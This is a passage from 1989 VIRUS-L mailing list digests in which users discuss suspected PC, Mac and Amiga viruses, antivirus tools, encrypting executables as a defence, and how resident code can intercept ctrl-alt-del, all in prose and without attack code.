  8992. Wim Bonner  Bitnet:27313853@WSUVM1  Compuserve:72561,3135  (King-Rat)
  8993. The Loft - (509)335-7407 - 300/1200/2400 - 24hrs/day - PCboard 12.1/d
  8994. Acknowledge-To: <27313853@WSUVM1>
  8995.  
  8996. ------------------------------
  8997.  
  8998. Date:         Thu, 12 Jan 89 02:18:04 EST
  8999. From:         Steve <XRAYSROK@SBCCVM.BITNET>
  9000. Subject:      CBUG.COM (PC)
  9001.  
  9002. >Date:         Wed, 11 Jan 89 16:04:00 EST
  9003. >From:         Michael Brown <BROWN@CMR001.BITNET>
  9004. >Subject:      VIRUS ALERT: possible virus... keywords: CBUG, WEIRD (PC)
  9005.  
  9006. >    One of our AT clones has a file called C:\CBUG.COM. Running CBUG.COM
  9007. >has the following effect: The first time the Y key is pressed, it
  9008. >prints the message "YOUR COMPUTER IS NOW INFECTED WITH SOME WEIRD VIRUSES",
  9009. >and it hangs the system. A warm boot will restore the system to normal.
  9010.  
  9011. This is not a criticism of Michael, but I generally don't run
  9012. unfamiliar programs unless I have backed up everything on the system
  9013. that I care about.  I have no idea whether CBUG.COM is a legitimate
  9014. (but infected) program or not, but maybe someone else has heard of it.
  9015.  
  9016. >The file is dated 1/01/80 (which is unusual, because that machine has a
  9017. >clock, and usually get the date right) and the machine is running PCDOS
  9018. >3.3.
  9019.  
  9020. An expert will have to advise you about the contents of the file, but
  9021. there is nothing strange about the date.  That's just the creation
  9022. date/time on the PC that created the file (not necessarily correct).
  9023. Not only that, but I can set the clock on my PC to January 1, 1925 if
  9024. I want to (and guess what date/time stamp gets put on my files?).
  9025.  
  9026. >I checked the disk for other occurrences of the message, but it seems
  9027. >to only be there once.
  9028.  
  9029. Searching the disk and not finding the message in any other files
  9030. doesn't mean very much.  There is nothing to stop a virus from storing
  9031. the characters in reverse order or shifting them all by one ASCII
  9032. value and you might never find it...
  9033.  
  9034. >I am planning on working on it tonight, using the following procedure...
  9035. >- - Installing FSP 1.4 on the machine. (I have never used FluShot+, but from
  9036. >  my understanding it is reliable).
  9037. >- - Running all of the software packages installed on the machine to find
  9038. >  out if any of the programs on the hard disk call it.
  9039.  
  9040. This could be illuminating, but not if you have a virus which behaves
  9041. like the one Dimitri wrote for his class...  Why not disect the thing
  9042. (CBUG.COM) since you have it and see what it actually does (or send it
  9043. to someone on this list who will look at it for you)?
  9044.  
  9045. >- - I will ask the people that used the machine in the last few days
  9046. >  to use all of the software (on floppies) that they used while
  9047. >  the machine is running under FSP.
  9048.  
  9049. Hopefully not on the same machine, unless they don't care about
  9050. exposing perhaps their only clean copy to a potential virus.  And
  9051. hopefully not on somebody else's machine unless the other machine
  9052. doesn't have a hard drive and they take precautions not to spread the
  9053. thing.
  9054.  
  9055. >- - I am *not* sure this is a virus, but I don't understand how...
  9056.  
  9057. All it takes is somebody bringing an infected floppy into your lab...
  9058.  
  9059. Steven C. Woronick      |  Disclaimer: These are my own opinions
  9060. Physics Dept.           |  and ideas.  Always check things out for
  9061. SUNY at Stony Brook, NY |  yourself...
  9062. Acknowledge-To: <XRAYSROK@SBCCVM>
  9063.  
  9064. ------------------------------
  9065.  
  9066. End of VIRUS-L Digest
  9067. *********************VIRUS-L Digest              Friday, 13 Jan 1989         Volume 2 : Issue 13
  9068.  
  9069. Today's Topics:
  9070. Re: cbug (PC)
  9071. encrypting code.
  9072. nVIR in European beta of MS Word 4 (confirmation) (Mac)
  9073. How a worm/virus can trap ctl-alt-del (PC)
  9074.  
  9075. ---------------------------------------------------------------------------
  9076.  
  9077. Date:         Thu, 12 Jan 89 09:21:57 EST
  9078. From:         "Homer W. Smith" <CTM@CORNELLC.BITNET>
  9079. Subject:      Re: cbug (PC)
  9080.  
  9081. The 1.1.80 date on the cbug is the default date on a pc without its
  9082. time/date stamp set.  If you never set them that is what they come up
  9083. as.
  9084.  
  9085. ------------------------------
  9086.  
  9087. Date:         Thu, 12 Jan 89 09:23:45 EST
  9088. From:         "Homer W. Smith" <CTM@CORNELLC.BITNET>
  9089. Subject:      encrypting code.
  9090.  
  9091.      I have read an interesting article in a magazine called Reality
  9092. Hackers.  It is very drug and counter culture oriented, trying to give
  9093. these things respectability, but it had a good article on viruses.
  9094. (What the hell does CYBER mean anyhow!)
  9095.  
  9096.      One of the things it said that might be done to protect programs
  9097. from viruses is to make the operating system store all programs in a
  9098. scrambled state (encryption).  Then just before running them, decrypt
  9099. them.
  9100.  
  9101.      When and if a virus attaches to an encrypted program, it will get
  9102. scrambled when the program is decrypted and cause a crash.
  9103.  
  9104.      Seems like a very very good idea.  How say you all?
  9105.  
  9106. ------------------------------
  9107.  
  9108. Date:     Thu, 12 Jan 89 11:35 EST
  9109. From:     JEFF WASILKO--MEMBER OF PRINTER'S DEVILS-LOCAL #47
  9110.           <JJW7384@RITVAX.BITNET>
  9111. Subject:  nVIR in European beta of MS Word 4 (confirmation) (Mac)
  9112.  
  9113. The following is being forwarded from the Mac-User distribution list
  9114. in Europe.  It is a confirmation (although by the same person who
  9115. reported it initially).
  9116.  
  9117. - ----------------------cut here--------------------------------
  9118. Date: Thu, 12 Jan 89 11:04:49 GMT
  9119. From: UDUS010@OAK.CC.KCL.AC.UK
  9120. Subject: Confirmation of nVIR infection
  9121. Sender: EARN Macintosh Users List <MAC-USER@IRLEARN.BITNET>
  9122.  
  9123. I received confirmation from Text 100 (Microsoft's publicity people in
  9124. the UK) that Microsoft's own machine has been infected by nVIR!  Would
  9125. anyone who has received a beta copy of WORD 4 (Version 4b10) please
  9126. check that they have not infected their systems? it appears that not
  9127. all copies were infected for some reason... so don't panic until you
  9128. know for sure!  Meanwhile if anyone has Vaccine ine their System
  9129. folder and a program either hangs up on loading, or causes the machine
  9130. to do a full 'BOMB' with dialog box then suspect nVIR immediately!
  9131. Vaccine does not give it's standard report for an attempted infection
  9132. by nVIR, but don't ignore what it is doing its best to report!  David
  9133. Riddle Editor "Wheels for the Mind (UK)" King's College London
  9134.  
  9135. - --------------------------------end of forwarded message---------------------
  9136. -
  9137.  
  9138. forwarded by:
  9139.  
  9140. Jeff Wasilko
  9141. BITNET:     jjw7384@ritvax
  9142. INTERNET:   jjw7384%ritvax.bitnet@cunyvm.cuny.edu
  9143. UUCP:       {psuvax1, mcvax}!ritvax.bitnet!JJW7384
  9144. Disclaimer: Nobody ever cares what I say...
  9145.  
  9146. ------------------------------
  9147.  
  9148. Date:     Thu, 12 Jan 89 23:56 EST
  9149. From:     Dimitri Vulis <DLV@CUNYVMS1.BITNET>
  9150. Subject:  How a worm/virus can trap ctl-alt-del (PC)
  9151.  
  9152. >Date:        11 January 89, 20:00:17 +0100 (MEZ)
  9153. >From:        Otto Stolz         +49 7531 88 2645     RZOTTO   at DKNKURZ1
  9154. >> When a user presses ctl-alt-del, the keyboard code in BIOS [...]
  9155. >> redirects interrupt vectors to their default values, then boots. A
  9156. >> worm sitting in memory (not a _virus_) would have to duplicate all the
  9157. >> machine-specific stuff for various possible machines
  9158. >
  9159. >What if ... the worm... simply hooks Int 9?
  9160.  
  9161. Intercepting ctl-alt-del without intercepting INT 9 would be rather hard :)
  9162.  
  9163. Here's another technical explanation:
  9164.  
  9165. When a key is hit or released (on an IBM PC or compatible), the
  9166. hardware sends an INT 9 to the CPU (I will skip the IRQs, since it's
  9167. not relevant). The CPU saves its current instruction pointer on stack
  9168. and loads the new one from [4*9]. (Normally, this points to a routine
  9169. in ROM BIOS; in some version of DOS intercept this for `stack
  9170. management', also many TSRs intercept this interrupt to look for hot
  9171. keys; eventually, the control passes to ROM BIOS, or its equivalent
  9172. from KEYBxx). The BIOS routine INs a certain port to obtain a 'scan
  9173. code' of the key that triggered the interrupt (the scan code has
  9174. nothing to do with the ASCII code). If the high bit is set, it's a
  9175. break, else it's a make; thus, no more than 128 distinct scan codes
  9176. are possible.
  9177.  
  9178. The code then analyses what `kind' of key this was. Lots of logic is
  9179. involved here. For example, shift-like keys, like shift, ctrl, alt
  9180. don't put anything into the keyboard buffer, but set/reset certain
  9181. bits; caps/num/scroll lock toggle other bits; for other keys, like 'A'
  9182. or '8', these bits are examined to see if one should queue, e.g. upper
  9183. or lower case 'a', or '8' or '*'.  Everything is done in the software,
  9184. and this approach is highly felxible. One can redefine all the keys,
  9185. or replace the entire keyboard code with ease. The location of these
  9186. bits (set and reset by the software, I should emphasise) is pretty
  9187. standard in all BIOSes. When Ins, Del, or a function key scan code is
  9188. encountered, the BIOS queues a special code which the application
  9189. program interprets as it wishes. However, there's a special check on
  9190. Del key: if the 2 bits for Ctrl and Alt are on (indicating those keys
  9191. are pressed), the control is passed (via a jump, so this cannot be
  9192. hooked) to the reset code. Now, it's trivial to write code to trap
  9193. ctl-alt-del and e.g. to inhibit warm boot. I was tempted to write it
  9194. and post it, but it's not worth the trouble, I guess.
  9195.  
  9196. >Then it could fake the warm boot by resetting the interrupt vectors
  9197. >in a non-standard way that allowed itself to survive in memory and then
  9198. >jumping to the booting code.  The machine-specific stuff would only be
  9199. >the default values of the interrupt vectors (may be, even they are rather
  9200. >standard, or can be derived from the memory contents -- I don't know).
  9201.  
  9202. Here's where Otto is dead wrong.  The default interrupt vector values
  9203. are, surprisingly, pretty standard across most BIOSes; what you see is
  9204. some code, a jump around a 'standard' entry point, and a jump from
  9205. there to the relevant routine kilobytes away.
  9206.  
  9207. However, I encourage Otto to get hold of (any) Technical Reference
  9208. Manual with a BIOS listing and to see what `machine-specific code in
  9209. reset' is, or to re-read my previous posting about the boot sequence.
  9210.  
  9211. Certainly, if you are planning to affect a very specific
  9212. model/manufacturer (and this makes sense in a college micro lab, with
  9213. tens of identical machines), you can copy the machine-specific stuff
  9214. from the BIOS and reset the interrupt vectors (modulo the ones you
  9215. want, like 13 and 9 then) to their default BIOS values. I guess the
  9216. only way around it is to 1) avoid machines without a reset button, 2)
  9217. cold boot if you use a machine after someone (what I do, if I have
  9218. to).
  9219.  
  9220. >Or it could infect the disk/diskette to be booted from, and then rely
  9221. >on BIOS to be installed again;  the machine specific stuff would be nil,
  9222. >and if it was a boot-sector virus, all required subroutines would already
  9223. >be part of it.
  9224.  
  9225. This is certainly very feasible, except that a disk access immediately
  9226. after ctl-alt-del is pressed would look very suspicious. In fact,
  9227. Brain should have had this feature. Of course, write-protecting the
  9228. disk you boot from would prevent the infection, as usual.
  9229.  
  9230. (I hope I am not too hard on Otto---I do not wish to offend him, but I
  9231. do wish to express my strong disapproval of people who represent their
  9232. fantasies, conjectures and assumptions as facts. This is not a flame.)
  9233.  
  9234. - -Dimitri
  9235.  
  9236. ------------------------------
  9237.  
  9238. End of VIRUS-L Digest
  9239. *********************
  9240.  
  9241. VIRUS-L Digest              Friday, 13 Jan 1989         Volume 2 : Issue 14
  9242.  
  9243. Today's Topics:
  9244. Two-Day Computer Virus Seminar
  9245. AMIGA virus warning (Amiga)
  9246. Interferon virus detection program for Macintosh
  9247. Re: Interferon virus detection program for Macintosh
  9248. ISS OFF! Virus? (PC)
  9249. Request for *confirmation* on Friday the 13th *rumor*
  9250.  
  9251. ---------------------------------------------------------------------------
  9252.  
  9253. Date:    Fri, 13 Jan 89 08:04 CST
  9254. From:    Ken  De Cruyenaere <KDC@UOFMCC.BITNET> 204-474-8340
  9255. Subject: Two-Day Computer Virus Seminar
  9256.  
  9257.   (from the Computer Security Newsletter:)
  9258. Computer Viruses, Trojan Horses, Logic Bombs -- Strategies for Protection
  9259. Instructor John O'Leary describes and demonstrates examples,
  9260. discusses how they operate, how to detect their presence, and how
  9261. to guard against viral infection.  The seminar examines why we"re
  9262. seeing this epidemic now, the people who create viruses, and the
  9263. effects that computer viruses are having on software distribution
  9264. methids.  Administrative and technical controls, including demos
  9265. of commercially available "vaccination" software, will be offered.
  9266. The course is being offered in several cities:
  9267.    January 12-13 in New Orleans
  9268.    January 18-19 in Dallas
  9269.    February 2-3  in San Diego
  9270.    March 6 - 7   in Boston
  9271.    June 15 - 16  in Detroit
  9272. For complete details: Call Vanessa at 508-393-2600
  9273. cost is $595.00
  9274. - ---------------------------------------------------------------------
  9275. Ken De Cruyenaere - Computer Security Coordinator
  9276. Computer Services - University of Manitoba - Winnipeg, Manitoba, Canada
  9277. Bitnet: KDC@CCM.UManitoba.CA               (204)474-8340
  9278.  
  9279. ------------------------------
  9280.  
  9281. Date:  Fri, 13 Jan 89 08:50 EST
  9282. From:  "Joseph M. Beckman" <Beckman@DOCKMASTER.ARPA>
  9283. Subject:  AMIGA virus warning (Amiga)
  9284.  
  9285. >From one of my colleagues.
  9286.  
  9287.     I am enclosing a posting from a local Bulletin Board (Alfheim)
  9288. which I know to be reputable, and the individuals named in the posting
  9289. are reputable and well known developers in the Amiga Community.  I
  9290. have not had much luck in sending things to Virus-l, if you wish to
  9291. forward this, feel free to do so.  if not, then it is just for your
  9292. own info -- I know you follow virus issues.
  9293.  
  9294. - ---------------------------
  9295.  
  9296.  Msg:10663  Sec: 4 - Amiga Computer Room
  9297.       31-Dec-88  12:42 AM
  9298. Subj: virus alert!
  9299. From: Dj James
  9300.   To: all
  9301.  
  9302.   Today Steve Tibbett (VirusX author) gave me a copy of a new Amiga
  9303. virus.  This one does not attach itself to the boot sector of a disk
  9304. as the older viruses did.  Instead, this one opens the
  9305. Startup-sequence file and looks for the first executable file in the
  9306. S-S file.  It then opens this file and copies itself inside it.
  9307.   By doing this, it hopes to remain invisable from the standard boot
  9308. block virus checkers and yet always get executed early on in the boot
  9309. sequence.  The virus is pretty clever in the way it looks at the S-S
  9310. file and also how it rebuilds the executable file to include itself.
  9311.   In operation, it intercepts the OldOpenLibrary vector and inserts
  9312. it's own code there.  The OOL call doesn't require a version parameter
  9313. to be passed - so I'd expect that the OS itself uses that call to open
  9314. the ROM libraries (I'm guessing here).
  9315.   The virus will change the title bar of CLI windows to "AmigaDOS
  9316. presents: a new virus by the IRQ-Team V41.0" other than that, and the
  9317. fact that it writes itself to your boot disk, it seems harmless.  This
  9318. info comes from a disassembly - I'm not unleashing this thing in my
  9319. machine!  Steve claims that it won't work under DOS 1.3 - let's hope
  9320. that this is true so the number of infections will go down.
  9321.   If infected, turn off the machine, boot with a VIRGIN WB disk and
  9322. delete the first executable file in the infected disks
  9323. Startup-sequence, then copy a new version of that file to your WB
  9324. disk.  Let's hope that this relatively harmless virus doesn't suddenly
  9325. become a killer!  Djj
  9326.  
  9327. - ------------------------------------------
  9328.                       Thanks,
  9329.  
  9330. ------------------------------
  9331.  
  9332. Date:     Fri, 13 Jan 89 12:13 EST
  9333. From:     RESEARCH CLUSTER SUPERVISOR JMH 320 X2164
  9334.           <GARTH@FORDMURH.BITNET>
  9335. Subject:  Interferon virus detection program for Macintosh
  9336.  
  9337. Hi everyone:
  9338.  
  9339.      A couple of months ago occasionally my desktop accessories didn't
  9340. work.  I ran a program called Interferon (version 1.1b) and the
  9341. response was that I had viruses in my system folder and several
  9342. software packages (hypercard) and so on.  By the way, this DA problem
  9343. happened AFTER I had down-loaded PD stuff from MACSERVE@PUCC but that
  9344. *may* not be the source of the problem.
  9345.      I reformatted my Hard Disk just to make sure and then
  9346. re-installed everything.  Interferon when run again said "No viruses
  9347. detected".  I vowed not to put any more PD software on my HD.  I
  9348. haven't installed any other software since I reformatted the Hard Disk
  9349. and checked Interferon.
  9350.      This is the killer... I ran Interferon again today and I'm full
  9351. of reported viruses again.
  9352.      Has anybody had similar problems with this??  Is Interferon
  9353. reliable?  Does anybody know of absolutely reliable virus detection
  9354. programs?
  9355.      I am running System 6.0.2 and Finder 6.1 .
  9356.  
  9357. Thank you
  9358.  
  9359. /paul
  9360.  
  9361. ------------------------------
  9362.  
  9363. Date:         Fri, 13 Jan 89 13:08:03 EST
  9364. From:         Joe McMahon <XRJDM@SCFVM.GSFC.NASA.GOV>
  9365. Subject:      Re: Interferon virus detection program for Macintosh
  9366.  
  9367. "RESEARCH CLUSTER SUPERVISOR JMH 320 X2164 <GARTH@FORDMURH.BITNET>" writes:
  9368. >   ... I ran a program called Interferon (version 1.1b) ...
  9369. > ... This is the killer... I ran Interferon again today and I'm full
  9370. >of reported viruses again.
  9371. >     Has anybody had similar problems with this??  Is Interferon
  9372. >reliable?  Does anybody know of absolutely reliable virus detection
  9373. >programs?
  9374. >     I am running System 6.0.2 and Finder 6.1 ...
  9375.  
  9376. Okay, a couple of things.
  9377.  
  9378. Problem 1: You have a very, very old version of Interferon. The current
  9379.            version is 3.1.
  9380.  
  9381. Problem 2: The LaserWriter and LaserPrep files in System 6.0 and up will be
  9382.            labelled as infected by older versions of Interferon, even
  9383.            though they are clean.
  9384.  
  9385. TELL LISTSERV AT SCFVM GET INTERFER SITHQX to get the newest version
  9386. in BinHex format.
  9387.  
  9388. You may also want to get Apple's newest version of Virus RX, which can
  9389. now detect nVIR (hurrah!). Get that with TELL LISTSERV AT SCFVM GET
  9390. VIRUSRX SITXHQX.
  9391.  
  9392. Once you have those, drop me a private note and we'll go over your
  9393. disinfection technique to see if there might have been a problem
  9394. there.
  9395.  
  9396. - --- Joe M.
  9397.  
  9398. [Ed. Thanks again for your help, Joe!  It's greatly appreciated.]
  9399.  
  9400. ------------------------------
  9401.  
  9402. Date: Fri, 13 Jan 89 11:15:23 -0800
  9403. From: Steve Clancy <SLCLANCY@UCI.BITNET>
  9404. Subject: ISS OFF! Virus? (PC)
  9405.  
  9406. Has anyone encountered a virus or other badware which leaves a message
  9407. similar to a happy face followed by "ISS OFF!" ?  A local company
  9408. called me today and said that one of their AST 286's, running MS-DOS
  9409. 3.2 has been having a problem with files being chopped in half, and
  9410. growing numbers of bad sectors on the hard disk.
  9411.  
  9412. This seems so far to be happening when a file is saved using Lotus.
  9413. The message arose when a user was using PC-Tools from a floppy.  He
  9414. tried to save a batch file using a PC-Tools editor, and got the
  9415. message "unable to read sector" from PC-tools.  When he exited to DOS,
  9416. he saw the ISS OFF! message at the A: prompt.
  9417.  
  9418. I don't have all of the information yet, but I'm wondering if anyone
  9419. else has encountered this?  This is a credit company, and they are
  9420. really worried about information they have on their other disks!
  9421.  
  9422. - -- Thanks!
  9423.  
  9424. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  9425. |   Steve Clancy                      |  WELLSPRING RBBS            |
  9426. |   Biomedical Library                |  714-856-7996  24 HRS       |
  9427. |   P.O. Box 19556                    |  300-9600 N,8,1             |
  9428. |   University of California, Irvine  |  714-856-5087  nites/wkends |
  9429. |   Irvine, CA  92713                 |  300-1200 N,8,1             |
  9430. |   SLCLANCY@UCI                      |  "Are we having fun yet?"   |
  9431. |   SLCLANCY@ORION.CF.UCI.EDU         |                             |
  9432. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  9433.  
  9434. ------------------------------
  9435.  
  9436. Date: Fri, 13 Jan 89 14:39:03 est
  9437. From: ubu!luken@lehi3b15.csee.lehigh.edu
  9438. Subject: Request for *confirmation* on Friday the 13th *rumor*
  9439.  
  9440. I just heard an UNFOUNDED RUMOR about a Friday the 13th virus doing a
  9441. bit of damage in the United Kingdom.  Can any of our UK readers
  9442. confirm (or preferably deny) this?  If there's any truth to it, could
  9443. someone please send in some additional info?
  9444.  
  9445. Ken
  9446.  
  9447. ------------------------------
  9448.  
  9449. End of VIRUS-L Digest
  9450. *********************VIRUS-L Digest              Monday, 16 Jan 1989         Volume 2 : Issue 15
  9451.  
  9452. Today's Topics:
  9453. Checkup version 2.1 for IBM (PC)
  9454. Encrypted/Decrypted virii
  9455. Request for info on other MAC viri... (Mac)
  9456. CBUG: not a virus (PC)
  9457. Name this book  -- for a box of cookies!
  9458.  
  9459. ---------------------------------------------------------------------------
  9460.  
  9461. Date:     FRI JAN 13, 1989 17.51.56 EST
  9462. From:     "David A. Bader" <DAB3@LEHIGH>
  9463. Subject:  Checkup version 2.1 for IBM (PC)
  9464.  
  9465. Just a note I saw on the IBMPC-L list:
  9466.  
  9467. CHECKUP v. 2.1 has been released and is available from SIMTEL20 at
  9468. <msdos.trojan-pro>CHKUP21.ARC and is 79k.
  9469.  
  9470. Checkup is a program that can be used to check files' CRCs and
  9471. footprints.
  9472.  
  9473. David Bader
  9474. DAB3@LEHIGH
  9475.  
  9476. [Ed. The anonymous FTP is from WSMR-SIMTEL20.ARMY.MIL.  The directory
  9477. is on PD1:]
  9478.  
  9479. ------------------------------
  9480.  
  9481. Date:     Fri, 13 Jan 89 21:45 EST
  9482. From:     <ACS045@GMUVAX.BITNET>
  9483. Subject:  Encrypted/Decrypted virii
  9484.  
  9485. Homer W. Smith <CTM@CORNELLC.BITNET> writes:
  9486. [Magazine review/appraisal deleted]
  9487. >     One of the things it said that might be done to protect programs
  9488. >from viruses is to make the operating system store all programs in a
  9489. >scrambled state (encryption).  Then just before running them, decrypt
  9490. >them.
  9491. >     When and if a virus attaches to an encrypted program, it will get
  9492. >scrambled when the program is decrypted and cause a crash.
  9493. >     Seems like a very very good idea.  How say you all?
  9494.  
  9495. It sounds good, but there is one problem here.  The virus, in order to attach
  9496. itself to the file would most likely have to be in a decrypted format in order
  9497. to attach itself to the host program it is trying to infect.
  9498. Heres the possible problems:
  9499. 1. The virus has to be in a decrypted state in order to infect the host program
  9500. which itself is encrypted.  However, when the program executed, the OS will
  9501. perform the encrypt/decrypt algorithm on both the program and the virus that is
  9502. now attached to it. This is good for the program because it can now execute,
  9503. but the unencrypted virus code will become scrambled during this
  9504. process because what you're doing is decrypting a decrypted file which can
  9505. only hopelessly scramble the code.
  9506. 2. Okay, so an obvious way around this is to have the virus encrypt itself
  9507. after infecting the targeted file, but which method to use??. With 6.02*10^23
  9508. encryption schemes out there, a virus would be too big and take too much effort
  9509. to try and check for even the most popular coding or encryption schemes.
  9510.  
  9511. The idea sounds good but thats about it....
  9512. - ---Steve
  9513. - --------------
  9514. Steve Okay ACS045@GMUVAX.BITNET/acs045@gmuvax2.gmu.edu/CSR032 on The Source
  9515.  
  9516.   Disclaimer:The contents of this are less relevant than
  9517.   say, the New York Times Op Ed. page, but more relevant than, say, Plywood.
  9518.         ---Bloom County "Loose Tails"
  9519.  
  9520. [Ed. Isn't that the whole _idea_ behind encrypting executable files on
  9521. disk (so that any virus infecting them would effectively neuter itself
  9522. since it would be written unencrypted to disk)?  The next time the
  9523. newly infected executable file would be run, it would no doubt crash -
  9524. which, imho, is a far cry better than infecting another program(s).]
  9525.  
  9526. ------------------------------
  9527.  
  9528. Date:     Sat, 14 Jan 89 22:20:56 PST
  9529. From:     SPOCK@CALSTATE.BITNET  (Commander Spock)
  9530. Subject:  Request for info on other MAC viri... (Mac)
  9531.  
  9532. I need some help here.  I am currently doing a research project for an
  9533. informational resource management class, and fortunately, my project
  9534. is on security systems and protection, namely viruses.  I am a
  9535. Macintosh user (currently two at the moment) and have heard some
  9536. shocking news regarding NEW strains of "nVIR" viruses.  News is a
  9537. *BIT* slow around here, so I'm one of the last to hear things (kind of
  9538. sounds familiar here, don't it?).  At any rate, what does this "Hpat"
  9539. virus do?  Second, there is another virus out in the Macintosh world,
  9540. called "INIT 29".  I definitely DO NOT know what type and nature this
  9541. fellow is.  What does this one do?
  9542.  
  9543. In your reply, please be specific about type, species, and any
  9544. references as to where in memory it attacks, what applications are hit
  9545. most often...  often (please excuse, bad terminal line...), etc.  I
  9546. will be using the material that you send me in my report about viri.
  9547.  
  9548. Thanks in advance.
  9549.  
  9550. Spock          INTERNET: cbds080@ccs.csuscc.calstate.edu
  9551.                          cbds080@c730.csupom.calstate.edu
  9552.                  BITNET: cbds080@calstate.BITNET
  9553.  
  9554. "I think it has something to do with those ears..."  -- Capta  Kirk
  9555.  
  9556. ------------------------------
  9557.  
  9558. Date:     15 Jan 89 23:00:00 EST
  9559. From:     Michael Brown <BROWN@CMR001.BITNET>
  9560. Subject:  CBUG: not a virus (PC)
  9561.  
  9562. After considerable help from the netland folk, and an extensive
  9563. investigation, it has been determined that CBUG is probably not a
  9564. virus, and more likely, a prank program.
  9565.  
  9566. I would like to thank everyone for their assistance, especially, Ken
  9567. and the two individuals who offered to look at the code for me.  Not
  9568. only did their efforts make my life *considerably* easier, but with
  9569. their help, I was able to work on the problem efficiently, and with
  9570. confidence.
  9571.  
  9572. I say again, CBUG.COM is not a virus.
  9573.  
  9574. Thanx again,
  9575.  
  9576.                   CP6-Mail: Michael Brown @CMR
  9577.                   NET-Mail: <brownm@cmr001.bitnet>
  9578. Michael Brown   Snail-Mail: Service Informatique CMR, St-Jean, Que. J0J 1R0
  9579.  
  9580. ------------------------------
  9581. Date:     Tue, 10 Jan 89 02:10:18 PST
  9582. From:     cliff@LBL.Gov (Cliff Stoll)
  9583. Subject:  Name this book  -- for a box of cookies!
  9584.  
  9585. [Ed. This is forwarded from RISKS, with this editor's recommendation
  9586. to anyone who hasn't read "Stalking the Wily Hacker" to run to their
  9587. library and read it *now*!]
  9588.  
  9589. Fellow Riskees:
  9590.  
  9591. I'm writing a book, and I need a title.
  9592.  
  9593. It's about computer risks:  counter-espionage, networks, computer security,
  9594. and a hacker/cracker that broke into military computers.  It's a true
  9595. story about how we caught a spy secretly prowling through the Milnet.
  9596.  
  9597. Although it explains technical stuff, the book is aimed at the lay reader.
  9598. In addition to describing how this person stole military information,
  9599. it tells of the challenges of nailing this guy, and gives a slice of
  9600. life from Berkeley, California.
  9601.  
  9602. You can read a technical description of this incident in the
  9603. Communications of the ACM, May, 1988;  or Risks Vol 6, Num 68.
  9604.  
  9605. Better yet, read what my editor calls "A riveting, true-life adventure
  9606. of electronic espionage" ... available in September from Doubleday,
  9607. publishers of the finest in computer counter-espionage nonfiction
  9608. books.
  9609.  
  9610. So what?
  9611.  
  9612. Well, I'm stuck on a title.  Here's your chance to name a book.
  9613.  
  9614. Suggest a title (or sub-title).  If my editor chooses your title,
  9615. I'll give you a free copy of the book, credit you in the acknowledgements,
  9616. and send you a box of homemade chocolate chip cookies.
  9617.  
  9618. Send your suggestions to    CPStoll@lbl.gov   or   CPStoll@lbl (bitnet)
  9619.              Many thanx!    Cliff Stoll
  9620.  
  9621.  
  9622. ------------------------------
  9623.  
  9624. End of VIRUS-L Digest
  9625. *********************VIRUS-L Digest              Monday, 16 Jan 1989         Volume 2 : Issue 16
  9626.  
  9627. Today's Topics:
  9628. Any connection between the ping-pong virus and WordPerfect? (PC)
  9629. re:anti-viral encryption schemes
  9630.  
  9631. ---------------------------------------------------------------------------
  9632.  
  9633. Date:     Mon, 16 Jan 89 16:33:29 IST
  9634. From:     "Eldad Salzmann (+972)-3-494520" <ELDAD@TAUNIVM.BITNET>
  9635. Subject:  Any connection between the ping-pong virus and WordPerfect? (PC)
  9636.  
  9637. I am new to this list, I heard about it from Norbert Hanke after
  9638. sending a query about some viruses I ran into in Israel. The query was
  9639. sent both to Dist-Mic at RPICICGE and to RED-UG at TREARN. I'm
  9640. repeating my query here for the sake of those who haven't read it. I
  9641. will be very grateful if some of you, who feel that they are
  9642. well-informed, will be able to enlighten me a little about this
  9643. subject.
  9644.                             *     *     *
  9645. Originally entitled:
  9646.                    Needed:  A Virus Vademecum
  9647.  
  9648. Recently I've encountered the formidable Bouncing Ping-Pong virus on a
  9649. friend's hard disk. As far as I know, this is a "benign" virus, which
  9650. does not cause any damage to files, but I'm not sure about that.
  9651.  
  9652. I heard it resides on the root, but I'm not sure about that either
  9653. (what does this imply? That it attacks the system files, the two
  9654. hidden DOS files and/or the command.com?).
  9655.  
  9656. Is a diskette totally safe when it is write-protected? I was sure
  9657. about that, until I read some things which made me worry.
  9658.  
  9659. How can one know that the antivirus program s/he received is really
  9660. effective?  I guess it's not possible to know that, the taste of the
  9661. pudding is in the eating...
  9662.  
  9663.         Was WordPerfect infected by the omnipotent virus?
  9664.  
  9665. I don't know whether it had anything to do with the following event,
  9666. but...  A WordPerfect which was till then working quite smoothly from
  9667. the HD, sud- denly began to look at drive A: for its WP.exe file, and
  9668. to complain that the diskette was write-protected. At first I thought
  9669. that the virus had high expectations and aspired to enlarge its
  9670. kingdom over the diskette files as well, but it then occurred to me
  9671. that maybe WordPerfect needs to write something on the diskette (or
  9672. the HD) when it loads, something like a tempo- rary file which is
  9673. erased afterwards. Well, does it? And why does it need to load its
  9674. main file from a diskette all of a sudden, after it worked so nicely
  9675. from the HD?
  9676.  
  9677.                             *   *   *
  9678.  
  9679. Is there any panacea against viruses? And if not, are there any
  9680. programs which counteract both the first known virus (in Israel it was
  9681. the famous virus which appended itself to EXE and COM files,
  9682. indicating its existence by the appearance of the string "SuMSDos"
  9683. within the executable files) and the Bouncing Ping-Pong virus?
  9684.  
  9685. Any comments will be appreciated. I sincerely hope there are people on
  9686. this list who experienced some sort of a virus (or a Trojan horse) and
  9687. survived, and now can share with me their experience.
  9688.  
  9689. Eldad Salzmann    <ELDAD@TAUNIVM.BITNET>
  9690.  
  9691. ------------------------------
  9692.  
  9693. Date: Mon, 16 Jan 89 12:20:20 EST
  9694. From: Don Alvarez <boomer@space.mit.edu>
  9695. Subject: re:anti-viral encryption schemes
  9696.  
  9697. Homer W. Smith and others have been discussing program encryption as a
  9698. method of defending against viruses.  Before use, the program would be
  9699. decrypted.  Any virus which had attached itself to an application
  9700. would become scrambled and neutralized when the application was
  9701. decrypted.
  9702.  
  9703. Sorry to disagree with you, but you have to be very careful that the
  9704. "cure" isn't worse than the "disease".  If you do daily backups, you
  9705. can't loose more than 8 hours work.  30 seconds of decryption time 30
  9706. times a day means in two months you waste 8 hours doing decryptions.
  9707. Anyone who expects viral infections less frequently than once every
  9708. two months is quite literaly wasting their time with this scheme.
  9709. Consider instead just spending two minutes a day backing up your work.
  9710. At this rate, you will have achieved a savings in time as long as you
  9711. are infected at least once a year, and as a side benefit you are
